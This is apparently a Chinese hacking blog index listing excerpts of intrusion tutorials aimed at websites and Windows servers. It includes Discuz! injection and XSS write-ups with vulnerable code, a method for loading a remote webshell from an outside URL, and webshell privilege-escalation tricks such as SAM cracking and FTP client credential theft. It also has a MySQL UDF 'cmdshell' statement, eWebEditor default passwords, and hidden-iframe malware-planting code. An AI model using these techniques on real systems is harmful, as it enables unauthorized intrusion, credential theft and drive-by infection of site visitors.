分类: 网络安全 |
默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,
路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)
MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。
几个主要的配置有:
ServerComment:我的网站 //站点的名称

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7827

入侵大站的完整思路

注:
1.acunetix web vulnerability Scanner 4 简称AC4
2.另外以下一种方式走的通,就不用往下走了
3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的.
4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5851

Discuz! "$referer"输出值跨站漏洞

影响版本:Discuz! 7.X、Discuz! 6.X、Discuz! 5.X、Discuz!NT 3.X
其他版本可能也存在此问题。任何对referer进行赋值并输出的网站程序都存在该弱点。
漏洞描述:
在Discuz! 任意版本中存在以下页面:
/templates/default/attachpay.htm

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8686
无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.zeroplace.cn/shell.txt
3. 在任意位置输入:

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6618

Discuz! 7.2 存在注入漏洞

影响版本:
discuz! 7.2
漏洞描述:
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。

/manyou/sources/notice.php

if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("Delete FROM {$tablepre}myinvite Where appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("Select * FROM {$tablepre}myinvite Where hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("Delete FROM {$tablepre}myinvite Where hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("Delete FROM {$tablepre}mynotice Where id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}

很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
<*参考
www.discuz.net
*>
测试方法:
[Www.0daynet.Como]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10330

使用SC命令行配置启动windows服务

大家对于系统中的服务应该了解甚少,在这里我给大家详细介绍下,用SC命令来执行对windows XP 服务的执行
先来简单介绍下SC命令中的一些作用.首先大家打开“命令提示符”。 如果连“命令提示符”。 这个东西都不知道的话,可谓笑话了不多说了.点开始,运行CMD 可以打开“命令提示符”。 键入: sc configservice namestart= {boot|system|auto|demand|disabled} 
值 描述 
sc config 
修改注册表和“服务控制管理器”数据库中的服务项的值。 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8246

最新最全的WEBSHELL提权方法【3】

 winNT/2000提升权限 
  Windows NT/2000 通用的提升方法 
  攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。 
  本文简要介绍在 Windows NT4和 Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法: 
  方法1 :下载系统的 %windir%\\repair\\sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6884

最新最全的WEBSHELL提权方法【2】

使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。 
其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的 Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。 
其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。 
其三,通过替换系统服务来提升。 
其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10092

最新最全的WEBSHELL提权方法【1】

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用 
 WEBSHELL权限提升技巧 
c: d: e:..... 
C:\Documents and Settings\All Users\「开始」菜单\程序\ 
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, 

查看更多...

Tags: webshell 提权 教程 权限 黑客

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 11020
在网站运营的过程中,最令站长头痛的可能就是网站被入侵了,实际上,如果提前设置好网站的目录权限,就可以保证网站能够经受大部分的漏洞攻击。本文介绍了设置文件目录和数据库权限的方法,设置权限的方法也并不难,只要根据本文一步步进行操作,就可以大大提高网站的安全性。

  网站目录权限的设置方法

  大多数网站都是采用程序搭建,对于系统管理的目录,可以将其设置为可读也可执行脚本,但不可写入的权限;但是对于放置网页静态文件的目录,以及放置图片文件、模板文件的目录,就可以将其设置为可读写但不可执行的系统权限。在权限分配明确之后,即使系统被入侵,也只能浏览而无法对文件进行直接的操作。

查看更多...

Tags: 权限 黑客

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5888

Gene6 FTP Server提权方法

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
by:晓华
Gene6 FTP Server这个FTP软件简单易用,比SU的安全性高的多.
他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.
这一点和我们的SU一样,SU的管理端口是43958.

查看更多...

Tags: gene6 ftp server ftp 软件 提权 权限 黑客

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8620

手工入侵网站SQL语句

会用工具入侵的你,还没入门呢 正在的黑客是不需要工具的。。。


我们继续用上面的user.php和show.php两个文件举例,如果一个一个用户猜解实在是太慢了
,如果对方的密码或者其他敏感信息很复杂,又不会写Exploit,要猜到什么时候啊?来点大范围

查看更多...

Tags: 手工入侵 手工注入

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7193

恶意蠕虫病毒 暴风一号病毒分析报告

  这是一个由VBS脚本编写,采用加密和自变形手段,并且通过U盘传播的恶意蠕虫病毒。

  病毒行为:

  1、自变形

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8322

MSSQL备份HTA法

以前曾经流行过DB_OWNER权限备份BAT文件到系统启动项提权法。但是备份BAT文件的成功率一直不高。本质上是因为备份数据库时无论是日志备份还是差异备份都会有大量的其他数据写入到BAT文件中,偏偏BAT文件中命令长度是有限制的。所以备份的成功率很低。而我们却可以备份为HTA文件,HTA文件是HTML Application的缩写,翻译成中文就是HTML应用程序,我们可以用他写个HTA文件,再备份到启动项就可以了。


Code:

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7383

利用环境变量提权

有时候我们在webshell下查看系统变量的时候总能得到一些惊喜,

比如系统默认的是Path这个环境变量的值是:%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;假如系统装过php的话,那么它的环境变量可能是c:\php\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;

那么我们就有机可乘了,因为它的顺序在系统默认的路径前面。那么按照优先级,

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6107

FLASHFXP提权

其实这种方法也是一种很有效的提权手段,

从这里我们一般都可以猜出管理员的终端登陆密码。

只要在shell上发现FlashFxp的安装目录,即可下载sites.dat, quick.dat, Stats.dat三个文件,

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8124

mysql提权总结方法四则

一 UDF提权   

这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:   

create function cmdshell returns string soname ’udf.dll’    

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6379

ewebeditor漏洞利用总结

    先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:
1、首先访问默认管理页看是否存在。
        默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)
2、默认管理帐号密码!
        默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10672

Fckeditor漏洞利用总结

 查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6840

常用挂马代码大全

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6272